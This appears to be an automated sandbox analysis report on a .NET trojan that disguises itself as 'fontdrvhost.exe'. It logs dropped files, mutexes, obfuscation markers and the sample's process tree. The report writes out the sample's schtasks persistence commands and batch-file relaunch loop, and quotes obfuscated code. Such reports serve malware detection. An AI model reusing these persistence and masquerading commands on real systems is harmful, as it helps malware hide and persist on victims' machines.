                        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: ZT3pxe2Tb4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csCryptographic APIs: 'CreateDecryptor'
                        Source: DnshUSLJ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: tAOrkGQb.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: SKewgrff.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: IbKgwPay.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: zsrQNmVQ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@93/244@0/1
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tqrrAUxf.log
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\cfcca84f50e77cb6ac0a04c26d8ae71e39090d16a37d1ce7f59ef27a8be95bc3
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\AppData\Local\Temp\Haf5RcGt9x
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                        Source: ZT3pxe2Tb4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ZT3pxe2Tb4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: ZT3pxe2Tb4.exeReversingLabs: Detection: 86%
                        Source: ZT3pxe2Tb4.exeVirustotal: Detection: 73%
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile read: C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                        Source: unknownProcess created: C:\Users\user\Desktop\ZT3pxe2Tb4.exe "C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: unknownProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: ZT3pxe2Tb4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: ZT3pxe2Tb4.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: ZT3pxe2Tb4.exeStatic file information: File size 3672576 > 1048576
                        Source: ZT3pxe2Tb4.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x380200
                        Source: ZT3pxe2Tb4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs .Net Code: Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777246)),Type.GetTypeFromHandle(yhXwkbJpFlaQ2BEhFNf.vV0LqIx2Ymr(16777260))})
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7964 push ebx; retf 0_2_00007FFD9BBD796A
                        Source: ZT3pxe2Tb4.exe, IpUxhliHKcCdFefNH6B.cs High entropy of concatenated method names: 'M5xiNYhW88', 'krFixFhEKk', 'ujQise37PE', 'XDZ2qnWhUT4o3s6uaQ2C', 'VWnjYnWhvl7OjqSw0nsS', 'WhauFJWhPaBKUerrygMK', 'lRV843WhEgQOlQX6KsYA', 'pqch5qWh5vfdVB6uP9D1', 'UeI9ydWhI6YGaVvZwKlL', 'TlMEauWhQIQeJm4RKeGW'

                        Persistence and Installation Behavior

                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IsWIxvZJ.log
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tIxJOpqh.log
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\AppData\Local\fontdrvhost.exe
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sXAbZyyE.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aLYWFcdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ORiFVhtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\phJkSByL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fyqViYtd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VPWFywnw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NmOPODYO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fqGCEpSY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OjpXkDnJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ntFcgnCN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dKmMwLxf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UbSwNisy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KszgdGmQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CQeYyQPa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\jECTfuuL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aVjDvRpd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RraOLYZw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zfzIrCEh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWzHsBqG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pMKkuPam.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\feqUKmVF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WvXEaKPX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MMDorhKp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CdkYHFFH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mbeUnBPt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\cnAeDqUL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zntiAIEO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XsyMwKeS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xHZssejW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fvxnZIOH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TCIWpNeY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DACRVJoK.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uRiBlhjd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RRcFiATg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\yEAAOeyR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\oQWKeSDj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YOQFKOOU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OgxpbmIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uJzjHyIX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PEqxAxdY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FWXhQVXq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wsOrhbIJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJvbxzCb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dabMNWxu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MTLhtkSf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CkrRJHNx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ldamqVhj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZklVGaxA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IdUqmnRm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inkviYhq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzFFzMmI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GspafaHt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\maCuLVwe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UOaorzbP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JavyIngh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\BxnIYuRz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ifAdEpGk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zldaSYtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hRSCUTxn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YnJNkaiG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xOrrZDRn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SdGfOIqy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JAxqeOaQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zReaumVj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiKKKJQB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iKNvbzqU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZbufrXkm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GPSaXBQY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xgyKnYKq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\msUTDNPI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MHvzAhUM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CTQIQVae.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kMzdwiuP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aYVnMXzh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QpCXcuuA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GGiHtSpS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ouGCZwUD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fLnmpTPV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OEWHVhjH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DQsQlVoZ.logJump to dropped file
